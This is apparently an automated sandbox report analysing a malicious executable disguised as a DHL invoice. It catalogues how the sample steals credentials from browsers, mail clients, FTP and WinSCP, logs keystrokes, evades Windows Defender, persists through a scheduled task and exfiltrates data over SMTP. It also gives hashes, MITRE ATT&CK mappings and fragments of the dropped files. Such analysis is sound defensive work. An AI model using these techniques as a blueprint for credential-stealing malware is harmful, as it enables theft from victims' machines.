                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Users\user\AppData\Roaming\LIWBHGsz.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Users\user\AppData\Roaming\LIWBHGsz.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information

                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | File opened: C:\FTP Navigator\Ftplist.txt
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\Desktop\DHL Delivery Invoice.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                      Source: C:\Users\user\AppData\Roaming\LIWBHGsz.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities

                      Remote Access Functionality

                      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
                      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
                      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
                      Execution: 121 Windows Management Instrumentation; 1 Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
                      Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                      Privilege Escalation: 1 DLL Side-Loading; 111 Process Injection; 1 Scheduled Task/Job; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
                      Defense Evasion: 11 Disable or Modify Tools; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 22 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 141 Virtualization/Sandbox Evasion; 111 Process Injection
                      Credential Access: 2 OS Credential Dumping; 11 Input Capture; 1 Credentials in Registry; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
                      Discovery: 1 File and Directory Discovery; 24 System Information Discovery; 1 Query Registry; 211 Security Software Discovery; 1 Process Discovery; 141 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 System Network Configuration Discovery
                      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
                      Collection: 11 Archive Collected Data; 2 Data from Local System; 1 Email Collection; 11 Input Capture; 1 Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking
                      Command and Control: 1 Ingress Tool Transfer; 11 Encrypted Channel; 1 Non-Standard Port; 2 Non-Application Layer Protocol; 23 Application Layer Protocol; Multiband Communication; Commonly Used Port; Application Layer Protocol
                      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
                      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1564050, Sample: DHL Delivery Invoice.exe, Startdate: 27/11/2024, Architecture: WINDOWS, Score: 100

• Top level
  • DNS/IP: smtp.yandex.ru, smtp.yandex.com, api.ipify.org
  • Signatures: Found malware configuration; Malicious sample detected (through community Yara rule); Sigma detected: Scheduled temp file as task from temp location; 15 other signatures
  • Started: DHL Delivery Invoice.exe; LIWBHGsz.exe
• DHL Delivery Invoice.exe
  • Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  • Dropped: C:\Users\user\AppData\Roaming\LIWBHGsz.exe, PE32
  • Dropped: C:\Users\...\LIWBHGsz.exe:Zone.Identifier, ASCII
  • Dropped: C:\Users\user\AppData\Local\...\tmpC314.tmp, XML
  • Dropped: C:\Users\...\DHL Delivery Invoice.exe.log, ASCII
  • Started: DHL Delivery Invoice.exe
    • Signature: Installs a global keyboard hook
    • DNS/IP: smtp.yandex.ru 77.88.21.158, 49735, 49738, 49820 YANDEXRU Russian Federation
    • DNS/IP: api.ipify.org 104.26.12.205, 443, 49733, 49737 CLOUDFLARENETUS United States
  • Started: powershell.exe
    • Signature: Loading BitLocker PowerShell Module
    • Started: conhost.exe; WmiPrvSE.exe
  • Started: powershell.exe
    • Started: conhost.exe
  • Started: 2 other processes
    • Started: conhost.exe
• LIWBHGsz.exe
  • Signatures: Multi AV Scanner detection for dropped file; Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Machine Learning detection for dropped file
  • Started: LIWBHGsz.exe
    • Signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc)
  • Started: schtasks.exe
    • Started: conhost.exe

Source | Detection | Scanner | Label | Link
DHL Delivery Invoice.exe | 53% | ReversingLabs | Win32.Trojan.CrypterX |
DHL Delivery Invoice.exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\LIWBHGsz.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\LIWBHGsz.exe | 53% | ReversingLabs | Win32.Trojan.CrypterX |

No Antivirus matches

No Antivirus matches

Source | Detection | Scanner | Label | Link
http://crl.gl0 | 0% | Avira URL Cloud | safe |
http://crl.gls | 0% | Avira URL Cloud | safe |
http://ocsp2.globa | 0% | Avira URL Cloud | safe |
http://crl.gl( | 0% | Avira URL Cloud | safe |
http://secure.globalsh | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
smtp.yandex.ru | 77.88.21.158 | true | false | | high
api.ipify.org | 104.26.12.205 | true | false | | high
smtp.yandex.com | unknown | unknown | false | | high

Name | Malicious | Antivirus Detection | Reputation
https://api.ipify.org/ | false | | high
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
104.26.12.205 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false
77.88.21.158 | smtp.yandex.ru | Russian Federation | | 13238 | YANDEXRU | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1564050
Start date and time: 2024-11-27 19:14:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 10m 32s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: DHL Delivery Invoice.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@21/15@2/2
                                                                                                            EGA Information:
                                                                                                            • Successful, ratio: 100%
                                                                                                            HCA Information:
                                                                                                            • Successful, ratio: 99%
                                                                                                            • Number of executed functions: 181
                                                                                                            • Number of non-executed functions: 28
                                                                                                            Cookbook Comments:
                                                                                                            • Found application associated with file extension: .exe
                                                                                                            • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                                                            • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                            • Report size getting too big, too many NtCreateKey calls found.
                                                                                                            • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                            • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                            • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                            • VT rate limit hit for: DHL Delivery Invoice.exe
Time | Type | Description
13:15:12 | API Interceptor | 7820132x Sleep call for process: DHL Delivery Invoice.exe modified
13:15:13 | API Interceptor | 40x Sleep call for process: powershell.exe modified
13:15:17 | API Interceptor | 5431531x Sleep call for process: LIWBHGsz.exe modified
18:15:13 | Task Scheduler | Run new task: LIWBHGsz path: C:\Users\user\AppData\Roaming\LIWBHGsz.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
104.26.12.205 | Ransomware Mallox.exe | malicious | Targeted Ransomware | api.ipify.org/
104.26.12.205 | Yc9hcFC1ux.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | 6706e721f2c06.exe | malicious | Remcos | api.ipify.org/
104.26.12.205 | perfcc.elf | malicious | Xmrig | api.ipify.org/
104.26.12.205 | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | SecuriteInfo.com.Win32.MalwareX-gen.16395.23732.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | hloRQZmlfg.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | file.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.12.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.12.205 | file.exe | malicious | Unknown | api.ipify.org/
77.88.21.158 | DATASHEET.pdf.exe | malicious | AgentTesla |
77.88.21.158 | DATASHEET.exe | malicious | AgentTesla |
77.88.21.158 | datasheet.exe | malicious | AgentTesla |
77.88.21.158 | datasheet.exe | malicious | AgentTesla |
77.88.21.158 | 0zu73p2YBu.exe | malicious | Chrome Password Stealer, Fox Password Stealer, Opera Password Stealer |
77.88.21.158 | BWr9qnCU8X.exe | malicious | Unknown |
77.88.21.158 | REQUEST FOR OFFER EQUIPMENT ORDER LIST.exe | malicious | AgentTesla |
                                                                                                                          DHL Delivery Invoice.com.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                            Transferencias6231.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                              Justificante de pago.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                                                No context
                                                                                                                                Process:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1730
                                                                                                                                Entropy (8bit):5.35299682261553
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HKHKMR5vzHKnHKU57Uy:Pq5qHwCYqh3oPtI6eqzxqqMR5rqnqU5t
                                                                                                                                MD5:4D047149BCD6E4625565C631F1F723B2
                                                                                                                                SHA1:33909516B8ACB42E0B7E5E7D48F8B2D917094BCB
                                                                                                                                SHA-256:E84139F7D948F47ADF2E6346641261ADED096D1DB640EFF9B9B7D122121685DC
                                                                                                                                SHA-512:AE0D2AC2C282AEBA1B63851529892240C3BE5D56F3996F1BEE3263FBB13A7A044348D63F04B0705836C5847994BD553F342511F6BB4DD075E4E8A3E9CB12D54F
                                                                                                                                Malicious:true
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                Process:C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1730
                                                                                                                                Entropy (8bit):5.35299682261553
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HKHKMR5vzHKnHKU57Uy:Pq5qHwCYqh3oPtI6eqzxqqMR5rqnqU5t
                                                                                                                                MD5:4D047149BCD6E4625565C631F1F723B2
                                                                                                                                SHA1:33909516B8ACB42E0B7E5E7D48F8B2D917094BCB
                                                                                                                                SHA-256:E84139F7D948F47ADF2E6346641261ADED096D1DB640EFF9B9B7D122121685DC
                                                                                                                                SHA-512:AE0D2AC2C282AEBA1B63851529892240C3BE5D56F3996F1BEE3263FBB13A7A044348D63F04B0705836C5847994BD553F342511F6BB4DD075E4E8A3E9CB12D54F
                                                                                                                                Malicious:false
                                                                                                                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):2232
                                                                                                                                Entropy (8bit):5.379401388151058
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZmUyus:fLHxvIIwLgZ2KRHWLOuggs
                                                                                                                                MD5:1F07DBFC960DDEA7295F1A6FD48057B1
                                                                                                                                SHA1:05F3052BCC168B834CEA8EA48E050020C5CAD8F5
                                                                                                                                SHA-256:72F8629C56744FE3E1E3C1B705EF6355E59E5C96B4924427EE430C9F9EF46809
                                                                                                                                SHA-512:D94DF9A81FAF494891837FA73FECEF1D8226E18978A2EEA534409724409E13C6DACAB32E00C494FB2A140573E1C152EE407A0E070515B3802A06649690B1C491
                                                                                                                                Malicious:false
                                                                                                                                Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):60
                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                Malicious:false
                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                Process:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1574
                                                                                                                                Entropy (8bit):5.1145737739774875
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtafHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTYRv
                                                                                                                                MD5:98D336C96FE40FD34BACA1842B429BB9
                                                                                                                                SHA1:FB7BA442BC73A7A24C2ED56D20AEFB5950BE1D04
                                                                                                                                SHA-256:D4F31E20B646DC589867AE016E5F89CC2EC56CD5240728FCEB25AF0B1D3B3C34
                                                                                                                                SHA-512:4449511FBB1E66F0646807D2626D966BB3AE134CB70AA982327D5917A9312D9FEA733C13CD1CC5C0642A790875DA87D1257CC16841FB686786A2B7A081854FE7
                                                                                                                                Malicious:true
                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                Process:C:\Users\user\AppData\Roaming\LIWBHGsz.exe
                                                                                                                                File Type:XML 1.0 document, ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1574
                                                                                                                                Entropy (8bit):5.1145737739774875
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24:2di4+S2qh11hXy1mvWUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtafHxvn:cge1wYrFdOFzOzN33ODOiDdKrsuTYRv
                                                                                                                                MD5:98D336C96FE40FD34BACA1842B429BB9
                                                                                                                                SHA1:FB7BA442BC73A7A24C2ED56D20AEFB5950BE1D04
                                                                                                                                SHA-256:D4F31E20B646DC589867AE016E5F89CC2EC56CD5240728FCEB25AF0B1D3B3C34
                                                                                                                                SHA-512:4449511FBB1E66F0646807D2626D966BB3AE134CB70AA982327D5917A9312D9FEA733C13CD1CC5C0642A790875DA87D1257CC16841FB686786A2B7A081854FE7
                                                                                                                                Malicious:false
                                                                                                                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetworkAvail
                                                                                                                                Process:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1000448
                                                                                                                                Entropy (8bit):7.465213437585276
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:24576:YCokCSN9N5mSXYodhsVQ2FGnTM8NUFBl6TP:Bokn5mSXbhmQ2FGTM8q6TP
                                                                                                                                MD5:9AF85D4623CAFA79192F542727A6E923
                                                                                                                                SHA1:3739DBEEEC123626E43210A4DAF52D07B2A4247E
                                                                                                                                SHA-256:320BF0A79235FDBFD5D1ADADCFC530E134D9CF3AA67BFB5C63DFDDBC3BB3963F
                                                                                                                                SHA-512:AC7022AAA01FB838F8E61FADFF6BFCD1071812AA9048ED9FBC176A4E45C589C0095B976CF8255643D7F8C8483EBBB70ED6B72BCEAA4E4333CD3D5399EBCD1C14
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 53%
                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....bFg..............0..*...........H... ...`....@.. ....................................@.................................lH..O....`.. ............................................................................ ............... ..H............text....(... ...*.................. ..`.rsrc... ....`.......,..............@..@.reloc...............B..............@..B.................H......H.......................U...g..........................................N.'=d.1o..*)..+....DH....."Y....v...=o.\.1.SL..g .N{{j.0....h...9a).O......+........m.-...E...7}..7....*.N~.C.Z~..ES"X...l.;\.zPv......9S.n..3......lm.ln..L...8,X.gD....X...%.Hfu.m.@...^....z(.o........V.....&..RV*.....|)V{....A..4s.M...t....7$o(#..s.../t,...Ku?g..N|5.....)...n.....OC.....3...$..]$......Y.N..u..5.>..5d[..SkOQ._{t.nIU|.*..P..?..U............o...~+....fx.h*.M...J.]...(
                                                                                                                                Process:C:\Users\user\Desktop\DHL Delivery Invoice.exe
                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):26
                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                Malicious:true
                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
